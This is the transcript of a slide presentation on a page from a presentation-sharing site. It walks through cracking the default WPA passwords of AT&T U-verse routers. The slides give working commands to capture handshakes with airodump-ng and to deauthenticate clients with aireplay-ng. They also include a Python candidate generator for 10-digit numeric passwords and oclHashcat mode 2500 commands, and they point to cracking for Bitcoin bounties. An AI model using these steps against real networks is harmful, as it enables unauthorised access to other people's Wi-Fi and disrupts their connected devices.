1 / 25

Cracking AT&T U-verse Default WPA1/2 Passwords.

Cracking AT&T U-verse Default WPA1/2 Passwords. . by Jason Wheeler Awesome blog: http://blog.init6.me E. Getting the Handshake. Aircrack's site has a pretty good tutorial. Boot from Back Track 5 R3

amma
Download Presentation

Cracking AT&T U-verse Default WPA1/2 Passwords.

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Cracking AT&T U-verse Default WPA1/2 Passwords. by Jason Wheeler Awesome blog: http://blog.init6.me E

  2. Getting the Handshake

  3. Aircrack's site has a pretty good tutorial. Boot from Back Track 5 R3 First you want to see what kind of wifi connection you have to choose from. Start your wireless interface in monitor mode. #airmon-zc start wlan0 #airodump-ng --encrypt wpa mon0

  4. #airmon-zc stop mon0 Start airmon-zc on the channel of the target. #airmon-zc start wlan0 <Channel Number> Then start airodump on the same channel along with some other options. #airodump-ng mon0 --encrypt wpa --write <FILENAME> --output-format pcap -a --channel <Channel number>

  5. Deauthenticate a client #aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0 Where: • -0 means deauthentication • 5 is the number of deauths to send • -a 00:14:6C:7E:40:80 is the MAC address of the access point • -c 00:0F:B5:FD:FB:C2 is the MAC address of the client you are deauthing • mon0 is the interface name

  6. WPA Handshake

  7. Verify 4-way Handshake

  8. PMK = PBKDF2(passphrase, ssid, ssidLength, 4096, 256) The PTK is a keyed-HMAC function using the PMK on the two MAC addresses and the two nonces from the first two packets of the 4-Way Handshake.

  9. Verify 4-way Handshake The easy way...... #pyrit -r <FILENAME>.pcap analyze

  10. Strip out the junk. #pyrit -r <FILENAME>.pcap -o OUTPUT.pcap strip

  11. CAP-2-HCCAP To turn your pcap file into a hashcat-plus friendly file you can upload it to https://hashcat.net/cap2hccap/

  12. CRACK!!

  13. Python Script import sys MAX_INT = 9999999999 BAD_PATTERNS = {x * 3 for x in '0123456789'} for number in xrange(MAX_INT): int_string = str(number).rjust(10, '0') if any(pattern in int_string for pattern in BAD_PATTERNS): continue print ( int_string )

  14. Hashcat-plus $python 2wire.py | ./oclhashcat-plus64.bin -m 2500 -a 0 <filename>.hccap --gpu-accel=160 --gpu-loops=1024 88,770 c/s real or $./oclhashcat-plus64.bin -m 2500 -a 3 <filename>.hccap --gpu-accel=160 --gpu-loops=1024 -1?d ?1?1?1?1?1?1?1?1?1?1 114K c/s real

  15. Crack for Bitcoin. http://www.hashbounty.net/bounties

  16. sources http://etutorials.org/Networking/802.11+security.+wi-fi+protected+access+and+802.11i/Part+II+The+Design+of+Wi-Fi+Security/Chapter+10.+WPA+and+RSN+Key+Hierarchy/

More Related